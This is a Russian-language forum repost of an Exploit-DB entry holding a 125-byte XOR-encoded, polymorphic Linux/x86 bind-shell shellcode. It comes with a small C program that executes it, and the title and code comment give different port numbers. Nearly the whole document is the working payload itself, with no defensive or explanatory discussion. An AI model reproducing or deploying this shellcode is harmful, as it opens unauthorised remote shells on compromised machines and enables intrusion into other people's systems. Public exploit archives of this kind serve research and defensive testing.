Exploit Linux/x86 - Bind (6778/TCP) Shell + Polymorphic + XOR Encoded Shellcode (125 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14234
Проверка EDB
  1. Пройдено
Автор
GUNSLINGER_
Тип уязвимости
SHELLCODE
Платформа
LINUX_X86
CVE
N/A
Дата публикации
2010-07-05
C:
/*
Title  : bind port to 6678 XOR encoded polymorphic linux shellcode .
Name   : 125 bind port to 6678 XOR encoded polymorphic linux shellcode .
Date   : Tue Jul  6 01:52:33 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>

char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x74\x0e\xff"
		   "\x0a\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff"
		   "\xff\xff\x3b\xca\x3b\xd1\x3b\xd8\x5a\x60\x0b"
		   "\x60\x08\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83"
		   "\xcc\x58\x62\xb1\x08\x10\x70\x83\xeb\x60\x1a"
		   "\x5b\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x58"
		   "\x5c\x83\xeb\xb9\x0e\xba\x6c\xc7\x8a\x58\x58"
		   "\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83\xc9"
		   "\x3b\xc3\xba\x35\xc7\x8a\x4b\xba\x35\xc7\x8a"
		   "\x4b\xba\x35\xc7\x8a\x58\x62\x25\x25\x79\x62"
		   "\x62\x25\x68\x63\x64\x83\xe9\x58\x59\x83\xeb"
		   "\xba\x01\xc7\x8a";

		
int main(void)
{
	fprintf(stdout,"Length: %d\n",strlen(shellcode));
	(*(void(*)()) shellcode)();
}
 
Источник
www.exploit-db.com

Похожие темы